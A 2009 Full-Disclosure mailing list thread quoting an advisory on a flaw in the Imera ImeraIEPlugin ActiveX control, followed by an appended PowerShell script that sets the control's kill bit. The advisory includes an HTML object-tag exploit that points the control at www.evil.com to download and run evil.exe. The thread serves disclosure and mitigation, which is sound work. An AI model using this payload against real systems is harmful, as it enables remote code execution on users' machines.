Message-ID: <e1b25fd0903041059y7ba33c22h5a426fa28b06ab8e@mail.gmail.com>
Date: Wed, 4 Mar 2009 13:59:45 -0500
From: Jason Starks <jstarks440@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Imera ImeraIEPlugin ActiveX Control Remote Code Execution
That is why most of them are submitted to bugtraq (ew), and not FD, where
they are often discredited in various ways. You see, bugtraq will reject 4
out of 7 postings if you're not a subscriber to their super fun security
package, which offers lots of enjoyment of white hat and hacking zone-h
labs. On this ridiculous list, it's hard not to get your post through! Kazaa!
On Wed, Mar 4, 2009 at 3:51 AM, bob jones <bholdaaa@...il.com> wrote:
> doesn't submitting lame bugs in useless apps ever get old?
>
> On Tue, Mar 3, 2009 at 9:12 AM, Elazar Broad <elazar@...hmail.com> wrote:
>
>> Who:
>> Imera (http://www.imera.com)
>> Imera TeamLinks Client (http://teamlinks.imera.com/install.html)
>>
>> What:
>> ImeraIEPlugin.dll
>> Version 1.0.2.54
>> Dated 12/02/2008
>> {75CC8584-86D4-4A50-B976-AA72618322C6}
>> http://teamlinks.imera.com/ImeraIEPlugin.cab
>>
>> How:
>> This control is used to install the Imera TeamLinks Client
>> package. The control fails to validate that the content it is to
>> download and install is indeed the Imera TeamLinks Client software.
>>
>> Exploiting this issue is quite simple, like so:
>>
>> <object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
>> id="obj">
>> <param name="DownloadProtocol" value="http" />
>> <param name="DownloadHost" value="www.evil.com" />
>> <param name="DownloadPort" value="80" />
>> <param name="DownloadURI" value="evil.exe" />
>> </object>
>>
>> Fix:
>> The vendor has been notified.
>>
>> Workaround:
>> Set the killbit for the affected control, see
>> http://support.microsoft.com/kb/240797.
>> Use the Java installer for TeamLinks Client or install the software
>> manually from: http://teamlinks.imera.com/download.html
>>
>> Elazar
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
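
The kill-bit workaround from the quoted advisory, as an added example that is not part of the original thread: it sets the kill bit for the advisory's CLSID in both the native and 32-bit registry views, keeps any flags already present, and reads the value back. The registry location and the 0x400 flag are the ones documented in KB240797; the function name Set-KillBit is hypothetical.

```powershell
# Added example: set the Internet Explorer kill bit for the ImeraIEPlugin control.
# Run from an elevated PowerShell prompt.
$Clsid     = '{75CC8584-86D4-4A50-B976-AA72618322C6}'  # CLSID given in the advisory
$KillBit   = 0x400                                     # kill bit flag (KB240797)
$ValueName = 'Compatibility Flags'
$SubKey    = 'Microsoft\Internet Explorer\ActiveX Compatibility'

# Native view, plus the view that 32-bit Internet Explorer reads on 64-bit Windows.
$Views = @('HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\Wow6432Node')

function Set-KillBit {
    param([string]$View, [string]$Clsid)

    $key = Join-Path (Join-Path $View $SubKey) $Clsid
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Preserve compatibility flags that are already set and OR in the kill bit.
    $current = (Get-ItemProperty -LiteralPath $key -Name $ValueName `
                    -ErrorAction SilentlyContinue).$ValueName
    if ($null -eq $current) { $current = 0 }
    $new = $current -bor $KillBit
    New-ItemProperty -LiteralPath $key -Name $ValueName -PropertyType DWord `
        -Value $new -Force | Out-Null

    # Read the value back so the result reflects what is actually in the registry.
    $check = (Get-ItemProperty -LiteralPath $key -Name $ValueName).$ValueName
    [pscustomobject]@{
        Key    = $key
        Flags  = '0x{0:X8}' -f $check
        Killed = (($check -band $KillBit) -ne 0)
    }
}

foreach ($view in $Views) {
    # Wow6432Node does not exist on 32-bit Windows; skip it there.
    if (Test-Path -LiteralPath $view) {
        Set-KillBit -View $view -Clsid $Clsid
    }
}
```

Internet Explorer reads the flag when it instantiates the control, so restart any open browser windows after running the script.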